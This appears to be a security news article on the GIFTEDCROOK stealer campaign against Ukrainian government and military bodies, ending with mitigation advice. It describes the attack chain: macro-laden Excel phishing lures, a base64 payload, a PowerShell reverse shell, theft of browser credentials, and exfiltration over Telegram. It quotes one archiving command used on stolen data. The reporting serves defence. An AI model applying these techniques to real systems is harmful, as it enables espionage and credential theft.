Ukrainian government organizations are currently confronting a sophisticated cyber threat with the emergence of the GIFTEDCROOK stealer malware. This malicious software is designed to extract sensitive information from compromised systems, posing a significant risk to national security.
Since February 2025, cybersecurity experts have been monitoring a series of cyber-espionage activities attributed to a threat actor identified as UAC-0226. This campaign has primarily targeted military innovation centers, armed forces units, law enforcement agencies, and local government bodies, especially those situated near Ukraine’s eastern border. The focus on these critical institutions underscores the strategic intent behind the attacks.
On April 6, 2025, the Computer Emergency Response Team of Ukraine (CERT-UA) issued security alert CERT-UA#14303, highlighting the persistent nature of this threat. The GIFTEDCROOK malware is engineered to steal browser-related data, including saved credentials, cookies, and browsing histories from widely used browsers such as Chrome, Edge, and Firefox.
Infection Mechanism Analysis
The infection process begins with sophisticated phishing campaigns. Attackers distribute macro-enabled Excel documents (.xlsm) that serve as the initial vector for malware deployment. These documents are meticulously crafted with social engineering themes pertinent to landmine clearance, administrative fines, drone production, and compensation for damaged property, increasing the likelihood of user engagement.
Upon opening the malicious Excel file and enabling macros, embedded Visual Basic for Applications (VBA) code executes. This code decodes a base64-encoded payload hidden within the document’s cells and saves it to the system without a file extension, a tactic aimed at evading detection by traditional security measures.
Two primary malware variants have been identified in these attacks:
1. .NET-Based Tool: This variant incorporates a PowerShell reverse shell script sourced from a public GitHub repository known as PSSW100AVB.
2. GIFTEDCROOK Stealer: Written in C/C++, this variant specifically targets and exfiltrates browser data.
After collecting the targeted data, the malware compresses it using PowerShell’s native capabilities with commands such as:
`Compress-Archive -Path $StolenDataPath -DestinationPath $ArchivePath`
The compressed archive is then exfiltrated through Telegram channels. This method complicates detection efforts, as the malicious traffic blends seamlessly with legitimate messaging activities.
Further complicating attribution and detection, the threat actors send phishing emails from previously compromised accounts, including webmail services. This tactic leverages the trust associated with known contacts to increase the success rate of the phishing campaigns.
Broader Context
The GIFTEDCROOK malware is part of a larger pattern of cyber-espionage activities targeting Ukraine. Other groups, such as UAC-0200 and UAC-0219, have also intensified their operations throughout the spring of 2025. According to CERT-EU’s annual Threat Landscape Report, 44% of reported incidents in 2024 were linked to cyber espionage or prepositioning tactics typically attributed to state-sponsored actors.
Mitigation Strategies
To defend against such sophisticated threats, organizations are advised to implement the following measures:
– User Education: Conduct regular training sessions to raise awareness about phishing tactics and the importance of scrutinizing unsolicited emails, especially those containing attachments or links.
– Macro Management: Disable macros by default in Microsoft Office documents and only enable them for trusted sources.
– Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating malicious activities.
– Network Monitoring: Implement robust network monitoring to detect unusual data exfiltration patterns, particularly those involving encrypted channels like Telegram.
– Access Controls: Enforce strict access controls and regularly review user permissions to minimize the risk of unauthorized access.
By adopting these strategies, organizations can enhance their resilience against the evolving landscape of cyber threats exemplified by the GIFTEDCROOK malware.
